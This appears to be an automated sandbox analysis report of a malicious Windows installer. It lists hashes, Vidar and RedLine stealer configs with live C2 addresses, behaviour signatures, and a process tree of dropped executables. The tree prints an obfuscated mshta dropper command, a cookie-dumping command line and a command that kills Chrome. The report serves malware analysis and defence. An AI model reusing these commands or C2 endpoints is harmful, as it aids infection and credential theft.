Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    260s
  • max time network
    1816s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    23-08-2021 15:20

General

  • Target

    Setup (10).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

vidar

Version

40.1

Botnet

973

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    973

Extracted

Family

redline

Botnet

dibild2

C2

135.148.139.222:1494

Extracted

Family

vidar

Version

40.1

Botnet

995

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    995

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

redline

Botnet

23.08

C2

95.181.172.100:55640

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 1 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 18 IoCs
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 6 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 46 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 15 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 11 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 12 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 18 IoCs
  • Suspicious use of SetThreadContext 14 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 9 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 5 IoCs
  • Kills process with taskkill 8 IoCs
  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 19 IoCs
  • Modifies system certificate store 2 TTPs 13 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 29 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
    • Suspicious use of SetThreadContext
    • Modifies registry class
    PID:2536
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k SystemNetworkService
      2⤵
      • Drops file in System32 directory
      • Checks processor information in registry
      • Modifies data under HKEY_USERS
      • Modifies registry class
      PID:5848
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2556
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2548
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2316
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2300
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1916
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1404
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1236
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1192
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1064
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                        PID:824
                        • C:\Users\Admin\AppData\Roaming\afgfbwi
                          C:\Users\Admin\AppData\Roaming\afgfbwi
                          2⤵
                            PID:492
                            • C:\Users\Admin\AppData\Roaming\afgfbwi
                              C:\Users\Admin\AppData\Roaming\afgfbwi
                              3⤵
                                PID:7152
                            • C:\Users\Admin\AppData\Roaming\afgfbwi
                              C:\Users\Admin\AppData\Roaming\afgfbwi
                              2⤵
                                PID:9896
                                • C:\Users\Admin\AppData\Roaming\afgfbwi
                                  C:\Users\Admin\AppData\Roaming\afgfbwi
                                  3⤵
                                    PID:1092
                              • C:\Users\Admin\AppData\Local\Temp\Setup (10).exe
                                "C:\Users\Admin\AppData\Local\Temp\Setup (10).exe"
                                1⤵
                                • Checks computer location settings
                                • Modifies system certificate store
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of WriteProcessMemory
                                PID:3980
                                • C:\Users\Admin\Documents\pIPlsk_AVBX8bGFUce3E4Iv1.exe
                                  "C:\Users\Admin\Documents\pIPlsk_AVBX8bGFUce3E4Iv1.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1856
                                  • C:\Users\Admin\Documents\pIPlsk_AVBX8bGFUce3E4Iv1.exe
                                    "C:\Users\Admin\Documents\pIPlsk_AVBX8bGFUce3E4Iv1.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    PID:4336
                                • C:\Users\Admin\Documents\ddNK2K5SXvGG1NcenNPTMj8_.exe
                                  "C:\Users\Admin\Documents\ddNK2K5SXvGG1NcenNPTMj8_.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:3220
                                • C:\Users\Admin\Documents\HTRJRozCVIRRy7y_qHPWAlTy.exe
                                  "C:\Users\Admin\Documents\HTRJRozCVIRRy7y_qHPWAlTy.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:3900
                                  • C:\Users\Admin\Documents\HTRJRozCVIRRy7y_qHPWAlTy.exe
                                    C:\Users\Admin\Documents\HTRJRozCVIRRy7y_qHPWAlTy.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    PID:2680
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2680 -s 1164
                                      4⤵
                                      • Program crash
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5140
                                  • C:\Users\Admin\Documents\HTRJRozCVIRRy7y_qHPWAlTy.exe
                                    C:\Users\Admin\Documents\HTRJRozCVIRRy7y_qHPWAlTy.exe
                                    3⤵
                                      PID:5080
                                  • C:\Users\Admin\Documents\NdMj5hiraSdboYKecXXl9ioT.exe
                                    "C:\Users\Admin\Documents\NdMj5hiraSdboYKecXXl9ioT.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:3912
                                    • C:\Users\Admin\Documents\NdMj5hiraSdboYKecXXl9ioT.exe
                                      C:\Users\Admin\Documents\NdMj5hiraSdboYKecXXl9ioT.exe
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4956
                                  • C:\Users\Admin\Documents\rlrmZ8otVBbHniqMuu7dzviq.exe
                                    "C:\Users\Admin\Documents\rlrmZ8otVBbHniqMuu7dzviq.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:1092
                                    • C:\Users\Admin\Documents\rlrmZ8otVBbHniqMuu7dzviq.exe
                                      "C:\Users\Admin\Documents\rlrmZ8otVBbHniqMuu7dzviq.exe"
                                      3⤵
                                        PID:2076
                                    • C:\Users\Admin\Documents\p8x7mVtZTrcWkZN8TE5qU1Pq.exe
                                      "C:\Users\Admin\Documents\p8x7mVtZTrcWkZN8TE5qU1Pq.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      PID:2196
                                      • C:\Users\Admin\Documents\p8x7mVtZTrcWkZN8TE5qU1Pq.exe
                                        "C:\Users\Admin\Documents\p8x7mVtZTrcWkZN8TE5qU1Pq.exe"
                                        3⤵
                                          PID:8424
                                      • C:\Users\Admin\Documents\sY1vSMVBtaUeAUQUwB8KN_P6.exe
                                        "C:\Users\Admin\Documents\sY1vSMVBtaUeAUQUwB8KN_P6.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:2608
                                        • C:\Users\Admin\Documents\sY1vSMVBtaUeAUQUwB8KN_P6.exe
                                          "C:\Users\Admin\Documents\sY1vSMVBtaUeAUQUwB8KN_P6.exe"
                                          3⤵
                                            PID:4732
                                        • C:\Users\Admin\Documents\E5ZAKiJNTpEprDQURSelW01n.exe
                                          "C:\Users\Admin\Documents\E5ZAKiJNTpEprDQURSelW01n.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2368
                                          • C:\Users\Admin\AppData\Roaming\2924727.exe
                                            "C:\Users\Admin\AppData\Roaming\2924727.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3220
                                            • C:\Users\Admin\Documents\ddNK2K5SXvGG1NcenNPTMj8_.exe
                                              C:\Users\Admin\Documents\ddNK2K5SXvGG1NcenNPTMj8_.exe
                                              4⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5060
                                          • C:\Users\Admin\AppData\Roaming\8307429.exe
                                            "C:\Users\Admin\AppData\Roaming\8307429.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Adds Run key to start application
                                            PID:3340
                                            • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                              "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                              4⤵
                                                PID:5260
                                            • C:\Users\Admin\AppData\Roaming\8447208.exe
                                              "C:\Users\Admin\AppData\Roaming\8447208.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              PID:4820
                                            • C:\Users\Admin\AppData\Roaming\2567175.exe
                                              "C:\Users\Admin\AppData\Roaming\2567175.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              PID:5212
                                          • C:\Users\Admin\Documents\9rZ2R3dgL3MMyPe9kwjPk52h.exe
                                            "C:\Users\Admin\Documents\9rZ2R3dgL3MMyPe9kwjPk52h.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:2076
                                          • C:\Users\Admin\Documents\e7CMtO4ideooDQ2mHlQpHVHw.exe
                                            "C:\Users\Admin\Documents\e7CMtO4ideooDQ2mHlQpHVHw.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:3108
                                          • C:\Users\Admin\Documents\UEgnv1W5PNxyP5573bD_VJih.exe
                                            "C:\Users\Admin\Documents\UEgnv1W5PNxyP5573bD_VJih.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:2040
                                          • C:\Users\Admin\Documents\86_osXiLhpC0PqD6_axT_E0A.exe
                                            "C:\Users\Admin\Documents\86_osXiLhpC0PqD6_axT_E0A.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:2980
                                          • C:\Users\Admin\Documents\SvjI0STtOSfXA8WIh3rOBVEr.exe
                                            "C:\Users\Admin\Documents\SvjI0STtOSfXA8WIh3rOBVEr.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Checks BIOS information in registry
                                            • Checks whether UAC is enabled
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3884
                                          • C:\Users\Admin\Documents\7EWQ5Z6QOdVRJR8qY3zvTlHA.exe
                                            "C:\Users\Admin\Documents\7EWQ5Z6QOdVRJR8qY3zvTlHA.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:2516
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 1708
                                              3⤵
                                              • Program crash
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4036
                                          • C:\Users\Admin\Documents\_ebcpcM03O7LttpQioMFHe7H.exe
                                            "C:\Users\Admin\Documents\_ebcpcM03O7LttpQioMFHe7H.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Checks BIOS information in registry
                                            • Checks whether UAC is enabled
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3964
                                          • C:\Users\Admin\Documents\5ecvmmcvPNPMKjXgLJlR_f6p.exe
                                            "C:\Users\Admin\Documents\5ecvmmcvPNPMKjXgLJlR_f6p.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:4052
                                            • C:\Users\Admin\Documents\5ecvmmcvPNPMKjXgLJlR_f6p.exe
                                              "C:\Users\Admin\Documents\5ecvmmcvPNPMKjXgLJlR_f6p.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Checks SCSI registry key(s)
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious behavior: MapViewOfSection
                                              PID:4780
                                          • C:\Users\Admin\Documents\s_a4w_Gz60vAtGEWYMLwn8p2.exe
                                            "C:\Users\Admin\Documents\s_a4w_Gz60vAtGEWYMLwn8p2.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:3356
                                            • C:\Windows\SysWOW64\mshta.exe
                                              "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\s_a4w_Gz60vAtGEWYMLwn8p2.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\s_a4w_Gz60vAtGEWYMLwn8p2.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                              3⤵
                                                PID:4600
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\s_a4w_Gz60vAtGEWYMLwn8p2.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\s_a4w_Gz60vAtGEWYMLwn8p2.exe" ) do taskkill -f -iM "%~NxA"
                                                  4⤵
                                                    PID:5024
                                              • C:\Users\Admin\Documents\jNm7FPKENMjsdOrSgPOBkLBI.exe
                                                "C:\Users\Admin\Documents\jNm7FPKENMjsdOrSgPOBkLBI.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                PID:2192
                                              • C:\Users\Admin\Documents\oy4Xmr3iL9ApraXX0KaHPbc4.exe
                                                "C:\Users\Admin\Documents\oy4Xmr3iL9ApraXX0KaHPbc4.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Drops file in Program Files directory
                                                PID:2072
                                                • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                  "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Checks whether UAC is enabled
                                                  • Drops file in Program Files directory
                                                  PID:4500
                                                • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                  "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  PID:4588
                                                • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                  "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  PID:4416
                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    4⤵
                                                      PID:9852
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      4⤵
                                                        PID:9640
                                                  • C:\Users\Admin\Documents\JVCioEqlIXNGESEhXVDlukqm.exe
                                                    "C:\Users\Admin\Documents\JVCioEqlIXNGESEhXVDlukqm.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:184
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 184 -s 660
                                                      3⤵
                                                      • Program crash
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1224
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 184 -s 708
                                                      3⤵
                                                      • Program crash
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1904
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 184 -s 748
                                                      3⤵
                                                      • Program crash
                                                      PID:284
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 184 -s 744
                                                      3⤵
                                                      • Program crash
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5620
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 184 -s 1120
                                                      3⤵
                                                      • Program crash
                                                      PID:4016
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 184 -s 1112
                                                      3⤵
                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                      • Program crash
                                                      PID:2100
                                                  • C:\Users\Admin\Documents\_cKxuv7ONdkb1hK2zJn5J_XS.exe
                                                    "C:\Users\Admin\Documents\_cKxuv7ONdkb1hK2zJn5J_XS.exe"
                                                    2⤵
                                                      PID:1612
                                                      • C:\Users\Admin\AppData\Local\Temp\is-L7OSH.tmp\_cKxuv7ONdkb1hK2zJn5J_XS.tmp
                                                        "C:\Users\Admin\AppData\Local\Temp\is-L7OSH.tmp\_cKxuv7ONdkb1hK2zJn5J_XS.tmp" /SL5="$90062,138429,56832,C:\Users\Admin\Documents\_cKxuv7ONdkb1hK2zJn5J_XS.exe"
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Suspicious use of FindShellTrayWindow
                                                        PID:4240
                                                        • C:\Users\Admin\AppData\Local\Temp\is-O5VV4.tmp\Setup.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\is-O5VV4.tmp\Setup.exe" /Verysilent
                                                          4⤵
                                                          • Executes dropped EXE
                                                          • Drops file in Program Files directory
                                                          PID:4112
                                                          • C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
                                                            "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
                                                            5⤵
                                                            • Executes dropped EXE
                                                            PID:5232
                                                          • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                            "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                            5⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Enumerates connected drives
                                                            • Suspicious use of FindShellTrayWindow
                                                            PID:5368
                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629472577 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                              6⤵
                                                              • Loads dropped DLL
                                                              PID:6120
                                                          • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                            "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                            5⤵
                                                            • Executes dropped EXE
                                                            PID:5444
                                                            • C:\Users\Admin\AppData\Local\Temp\is-M7C3S.tmp\WEATHER Manager.tmp
                                                              "C:\Users\Admin\AppData\Local\Temp\is-M7C3S.tmp\WEATHER Manager.tmp" /SL5="$103A0,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                              6⤵
                                                                PID:5804
                                                                • C:\Users\Admin\AppData\Local\Temp\is-S8GDP.tmp\Setup.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-S8GDP.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                  7⤵
                                                                  • Loads dropped DLL
                                                                  • Enumerates connected drives
                                                                  • Modifies system certificate store
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  PID:4892
                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-S8GDP.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-S8GDP.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629472577 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                    8⤵
                                                                      PID:3916
                                                              • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                5⤵
                                                                • Executes dropped EXE
                                                                PID:5516
                                                                • C:\Users\Admin\AppData\Local\Temp\is-KD9JF.tmp\VPN.tmp
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-KD9JF.tmp\VPN.tmp" /SL5="$103B2,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  PID:5876
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-J0AJJ.tmp\Setup.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-J0AJJ.tmp\Setup.exe" /silent /subid=720
                                                                    7⤵
                                                                      PID:7504
                                                                      • C:\Users\Admin\AppData\Local\Temp\is-D20D5.tmp\Setup.tmp
                                                                        "C:\Users\Admin\AppData\Local\Temp\is-D20D5.tmp\Setup.tmp" /SL5="$70038,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-J0AJJ.tmp\Setup.exe" /silent /subid=720
                                                                        8⤵
                                                                        • Loads dropped DLL
                                                                        • Drops file in Program Files directory
                                                                        • Modifies system certificate store
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        PID:5892
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                          9⤵
                                                                            PID:8224
                                                                            • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                              tapinstall.exe remove tap0901
                                                                              10⤵
                                                                              • Checks SCSI registry key(s)
                                                                              PID:8840
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                            9⤵
                                                                              PID:8648
                                                                              • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                tapinstall.exe install OemVista.inf tap0901
                                                                                10⤵
                                                                                  PID:7340
                                                                              • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                9⤵
                                                                                  PID:4864
                                                                                • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                  "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                  9⤵
                                                                                    PID:4064
                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:5592
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd.exe /c taskkill /f /im chrome.exe
                                                                              6⤵
                                                                                PID:8004
                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                  taskkill /f /im chrome.exe
                                                                                  7⤵
                                                                                  • Kills process with taskkill
                                                                                  PID:6548
                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              PID:5688
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-90J0O.tmp\MediaBurner2.tmp
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-90J0O.tmp\MediaBurner2.tmp" /SL5="$10448,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                6⤵
                                                                                  PID:6120
                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                PID:5760
                                                                                • C:\Users\Admin\AppData\Roaming\8642580.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\8642580.exe"
                                                                                  6⤵
                                                                                    PID:4316
                                                                                  • C:\Users\Admin\AppData\Roaming\5354056.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\5354056.exe"
                                                                                    6⤵
                                                                                    • Suspicious behavior: SetClipboardViewer
                                                                                    PID:4200
                                                                                  • C:\Users\Admin\AppData\Roaming\7334244.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\7334244.exe"
                                                                                    6⤵
                                                                                      PID:4244
                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:1612
                                                                                    • C:\Users\Admin\AppData\Roaming\5746350.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\5746350.exe"
                                                                                      6⤵
                                                                                        PID:1172
                                                                                      • C:\Users\Admin\AppData\Roaming\3879525.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\3879525.exe"
                                                                                        6⤵
                                                                                          PID:6184
